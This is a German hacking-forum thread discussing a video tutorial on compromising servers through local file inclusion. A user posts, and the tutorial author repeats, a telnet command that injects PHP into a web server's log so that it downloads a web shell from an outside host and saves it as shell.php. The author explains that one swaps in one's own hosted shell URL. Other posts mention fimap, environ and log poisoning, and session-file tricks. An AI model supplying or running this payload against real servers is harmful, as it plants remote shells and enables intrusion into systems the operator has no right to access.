Root Server Hacking via LFI by hAgBaRd2ooo

[J0hn.X3r]

Nettes Tutorial. Die Musikwahl koennt glatt von meinem Bruder stammen

Werd mein Feedback hier nachher editieren, wenn ich mir das Tut ganz anschau.

Edit: Die Methode und der Source hat mich ziemlich an n00bors Tutorial erinnert, daher in meinen Augen an sich "nix neues". Auch haste es nicht wirklich an nem echten "root" getestet und daher war es leider nicht soo interessant.

[moppelito]

Ich kriege den Telnet teil nicht hin^^
habe zwar bei mir Telnet gestarted, aber der sagt mir Snytaxfehler!
Ich habe Folgendes eingegeben:

Code:

telnet 127.0.0.1 80 ->GET/<?php $datei = fopen("shell.php","w+");$stream = fopen("http://st0rmcl4n.st.funpic.de/c.txt", "r");while (!feof($stream)) { $shell .= fgets($stream); } fclose($stream);fwrite($datei,$shell) ;fclose($stream);fclose($datei); ?>

sry falls ich etwas falsch gemacht habe, kenne mich aber mit telnet nicht so gut aus!

[100]

Was habt ihr alle gegen Rapidshare.. mags nicht doch noch wer hochladen?

[hAgBaRd2ooo]

Ich kriege den Telnet teil nicht hin^^
habe zwar bei mir Telnet gestarted, aber der sagt mir Snytaxfehler!
Ich habe Folgendes eingegeben:

Code:

telnet 127.0.0.1 80 ->GET/<?php $datei = fopen("shell.php","w+");$stream = fopen("http://st0rmcl4n.st.funpic.de/c.txt", "r");while (!feof($stream)) { $shell .= fgets($stream); } fclose($stream);fwrite($datei,$shell) ;fclose($stream);fclose($datei); ?>

sry falls ich etwas falsch gemacht habe, kenne mich aber mit telnet nicht so gut aus!

Ja du musst die URL schon ändern^^
Sprich du brauchst schon einen Space auf dem du die c.txt storn' kannst

[Crassmaker]

Solltest dann auch die entsprechende IP von dem Server verwenden, zum testen ist es Lokal ja ok xD

Desweiteren kann man fimap benutzen, um evtl. L/R FI zu finden.
Für Anfänger recht gut geeigenet ;-)

[wowa236]

Hallo,

erstmal danke für das TuT, ist echt super gemacht...
nur Bushido ist peinlich und stinkt ( obwohl ich sehr gerne rap / hip hop höre )
das zoomen ist auch ein kleineswenig nervig, weil man denkt man verpasst was das du schreibst...

zu den leuten die über speed / hoster meckern...

früher hat man mit ach und krach FTP Server gesucht und war glücklich wenn man diese knacken konnte. dann gings erst richtig ab wenn man mit 3,5kb/s gesaugt hat :-)

man sollte also wirklich nicht rumheulen wenn man heute die ganzen filehoster angebote sieht und 50kb/s bringt einen nicht um.

gruß, danke

[Lord_Ben@]

also ich finde das tut auch sehr gut und ich werde mich auch mal mit lfi beschäftigen, aber mein prob. ist das ich nicht weis wie ich eine lfi lücke finden kann.... wäre nett wenn mir da einer helfen könnte.

[moppelito]

Ja du musst die URL schon ändern^^
Sprich du brauchst schon einen Space auf dem du die c.txt storn' kannst

ja, das habe ich ja, aber der sagt mir trotzdem Syntaxerror! -.-

[Kzed]

Danke sehr! Jetzt weiß ich auch was LFI heißt O.o RFI kannt ich schon , Naja fand das tutorial wirklich sehr interessant. Bin jetzt aber auch leicht erschrocken wie einfach es ist O.o

[newkaiza]

mh hab mir das vid jetzt nich angeschaut, aber denke mal es geht um ~environ oder error/access logs. viel intressanter find ich phpsessid ^^. Vllcht mach ich damit iwann ma nen tut